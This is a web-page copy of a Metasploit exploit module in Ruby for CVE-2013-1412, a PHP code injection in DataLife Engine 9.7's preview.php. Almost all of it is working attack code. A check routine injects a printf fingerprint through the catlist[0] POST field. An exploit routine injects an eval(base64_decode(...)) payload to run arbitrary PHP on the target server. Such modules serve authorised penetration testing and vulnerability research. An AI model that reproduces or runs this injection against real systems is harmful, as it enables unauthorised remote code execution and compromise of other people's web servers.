Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/datalife_preview_exec.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpClient
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'DataLife Engine preview.php PHP Code Injection',
16
'Description' => %q{
17
This module exploits a PHP code injection vulnerability DataLife Engine 9.7.
18
The vulnerability exists in preview.php, due to an insecure usage of preg_replace()
19
with the e modifier, which allows to inject arbitrary php code, when there is a
20
template installed which contains a [catlist] or [not-catlist] tag, even when the
21
template isn't in use currently. The template can be configured with the TEMPLATE
22
datastore option.
23
},
24
'Author' => [
25
'EgiX', # Vulnerability discovery
26
'juan vazquez' # Metasploit module
27
],
28
'License' => MSF_LICENSE,
29
'References' => [
30
[ 'CVE', '2013-1412' ],
31
[ 'OSVDB', '89662' ],
32
[ 'EDB', '24438' ],
33
[ 'BID', '57603' ],
34
[ 'URL', 'http://karmainsecurity.com/KIS-2013-01' ],
35
[ 'URL', 'http://dleviet.com/dle/bug-fix/3281-security-patches-for-dle-97.html' ]
36
],
37
'Privileged' => false,
38
'Platform' => ['php'],
39
'Arch' => ARCH_PHP,
40
'Payload' => {
41
'Keys' => ['php']
42
},
43
'DisclosureDate' => '2013-01-28',
44
'Targets' => [ ['DataLife Engine 9.7', {}], ],
45
'DefaultTarget' => 0,
46
'Notes' => {
47
'Reliability' => UNKNOWN_RELIABILITY,
48
'Stability' => UNKNOWN_STABILITY,
49
'SideEffects' => UNKNOWN_SIDE_EFFECTS
50
}
51
)
52
)
53
54
register_options(
55
[
56
OptString.new('TARGETURI', [ true, "The base path to the web application", "/"]),
57
OptString.new('TEMPLATE', [ true, "Template with catlist or not-catlit tag", "Default"])
58
]
59
)
60
end
61
62
def uri
63
normalize_uri(target_uri.path, 'engine', 'preview.php')
64
end
65
66
def send_injection(inj)
67
res = send_request_cgi(
68
{
69
'uri' => uri,
70
'method' => 'POST',
71
'vars_post' =>
72
{
73
'catlist[0]' => inj
74
},
75
'cookie' => "dle_skin=#{datastore['TEMPLATE']}"
76
}
77
)
78
res
79
end
80
81
def check
82
fingerprint = rand_text_alpha(4 + rand(4))
83
84
res = send_injection("#{rand_text_alpha(4 + rand(4))}')||printf(\"#{fingerprint}\");//")
85
86
if res and res.code == 200 and res.body =~ /#{fingerprint}/
87
return Exploit::CheckCode::Vulnerable
88
else
89
return Exploit::CheckCode::Safe
90
end
91
end
92
93
def exploit
94
print_status("Exploiting the preg_replace() to execute PHP code")
95
res = send_injection("#{rand_text_alpha(4 + rand(4))}')||eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));//")
96
end
97
end
98
99